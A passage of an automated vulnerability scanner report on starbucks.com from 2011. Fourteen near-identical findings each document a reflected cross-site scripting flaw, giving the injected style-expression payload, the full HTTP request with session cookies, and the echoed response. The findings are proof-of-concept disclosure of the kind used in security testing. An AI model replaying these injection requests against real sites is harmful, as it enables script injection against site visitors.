<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake?f0103"style="x:expression(alert(1))"e7f8b0994af=1"/>
...[SNIP]...

2.245. http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-very-berry-coffeecake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e31eb"style%3d"x%3aexpression(alert(1))"b5a7dd3f58b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e31eb"style="x:expression(alert(1))"b5a7dd3f58b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/reduced-fat-very-berry-coffeecake?e31eb"style%3d"x%3aexpression(alert(1))"b5a7dd3f58b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:11 GMT
Connection: close
Content-Length: 44686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake?e31eb"style="x:expression(alert(1))"b5a7dd3f58b=1"/>
...[SNIP]...

2.246. http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/starbucks-classic-coffee-cake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c557"style%3d"x%3aexpression(alert(1))"640124d6dd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c557"style="x:expression(alert(1))"640124d6dd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/starbucks-classic-coffee-cake?7c557"style%3d"x%3aexpression(alert(1))"640124d6dd5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:59:20 GMT
Connection: close
Content-Length: 44398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake?7c557"style="x:expression(alert(1))"640124d6dd5=1"/>
...[SNIP]...

2.247. http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/treat-sized-double-chocolate-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9f82"style%3d"x%3aexpression(alert(1))"12a2cb3519d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9f82"style="x:expression(alert(1))"12a2cb3519d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/treat-sized-double-chocolate-cookie?e9f82"style%3d"x%3aexpression(alert(1))"12a2cb3519d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:01 GMT
Connection: close
Content-Length: 43344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie?e9f82"style="x:expression(alert(1))"12a2cb3519d=1"/>
...[SNIP]...

2.248. http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/treat-sized-peanut-butter-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e303f"style%3d"x%3aexpression(alert(1))"5921d239029 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e303f"style="x:expression(alert(1))"5921d239029 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/treat-sized-peanut-butter-cookie?e303f"style%3d"x%3aexpression(alert(1))"5921d239029=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:36 GMT
Connection: close
Content-Length: 43323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie?e303f"style="x:expression(alert(1))"5921d239029=1"/>
...[SNIP]...

2.249. http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/vanilla-bean-cupcake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177c2"style%3d"x%3aexpression(alert(1))"a4806e71177 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 177c2"style="x:expression(alert(1))"a4806e71177 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/vanilla-bean-cupcake?177c2"style%3d"x%3aexpression(alert(1))"a4806e71177=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:10 GMT
Connection: close
Content-Length: 44004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake?177c2"style="x:expression(alert(1))"a4806e71177=1"/>
...[SNIP]...

2.250. http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/zucchini-walnut-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1b5d"style%3d"x%3aexpression(alert(1))"335d173fd30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1b5d"style="x:expression(alert(1))"335d173fd30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/zucchini-walnut-muffin?b1b5d"style%3d"x%3aexpression(alert(1))"335d173fd30=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:53 GMT
Connection: close
Content-Length: 43532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin?b1b5d"style="x:expression(alert(1))"335d173fd30=1"/>
...[SNIP]...

2.251. http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed0f5"style%3d"x%3aexpression(alert(1))"926577702c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed0f5"style="x:expression(alert(1))"926577702c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate?ed0f5"style%3d"x%3aexpression(alert(1))"926577702c9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:59:01 GMT
Connection: close
Content-Length: 41980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate?ed0f5"style="x:expression(alert(1))"926577702c9=1"/>
...[SNIP]...

2.252. http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/fruit-and-cheese-plate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc8c9"style%3d"x%3aexpression(alert(1))"dbeae4face2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc8c9"style="x:expression(alert(1))"dbeae4face2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/fruit-and-snack-plates/fruit-and-cheese-plate?bc8c9"style%3d"x%3aexpression(alert(1))"dbeae4face2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:47 GMT
Connection: close
Content-Length: 41397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate?bc8c9"style="x:expression(alert(1))"dbeae4face2=1"/>
...[SNIP]...

2.253. http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/protein-plate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7b24"style%3d"x%3aexpression(alert(1))"e4919033202 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7b24"style="x:expression(alert(1))"e4919033202 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/fruit-and-snack-plates/protein-plate?c7b24"style%3d"x%3aexpression(alert(1))"e4919033202=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:00 GMT
Connection: close
Content-Length: 42074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate?c7b24"style="x:expression(alert(1))"e4919033202=1"/>
...[SNIP]...

2.254. http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 576ec"style%3d"x%3aexpression(alert(1))"20b9b21506b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 576ec"style="x:expression(alert(1))"20b9b21506b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll?576ec"style%3d"x%3aexpression(alert(1))"20b9b21506b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:44:39 GMT
Connection: close
Content-Length: 42517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll?576ec"style="x:expression(alert(1))"20b9b21506b=1"/>
...[SNIP]...

2.255. http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0a4"style%3d"x%3aexpression(alert(1))"0ec2a3fedc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d0a4"style="x:expression(alert(1))"0ec2a3fedc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap?7d0a4"style%3d"x%3aexpression(alert(1))"0ec2a3fedc3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:45:52 GMT
Connection: close
Content-Length: 43047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap?7d0a4"style="x:expression(alert(1))"0ec2a3fedc3=1"/>
...[SNIP]...

2.256. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-brown-sugar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9dc0"style%3d"x%3aexpression(alert(1))"2675c27b610 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9dc0"style="x:expression(alert(1))"2675c27b610 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/oatmeal-brown-sugar?e9dc0"style%3d"x%3aexpression(alert(1))"2675c27b610=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:45:15 GMT
Connection: close
Content-Length: 41085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar?e9dc0"style="x:expression(alert(1))"2675c27b610=1"/>
...[SNIP]...

2.257. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-dried-fruit

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5905"style%3d"x%3aexpression(alert(1))"78a9793c5f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5905"style="x:expression(alert(1))"78a9793c5f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/oatmeal-dried-fruit?b5905"style%3d"x%3aexpression(alert(1))"78a9793c5f2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:45:09 GMT
Connection: close
Content-Length: 41314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-dried-fruit?b5905"style="x:expression(alert(1))"78a9793c5f2=1"/>
...[SNIP]...

2.258. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-mixed-nuts [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-mixed-nuts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa5a1"style%3d"x%3aexpression(alert(1))"e5e65ed367b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa5a1"style="x:expression(alert(1))"e5e65ed367b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/oatmeal-mixed-nuts?aa5a1"style%3d"x%3aexpression(alert(1))"e5e65ed367b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
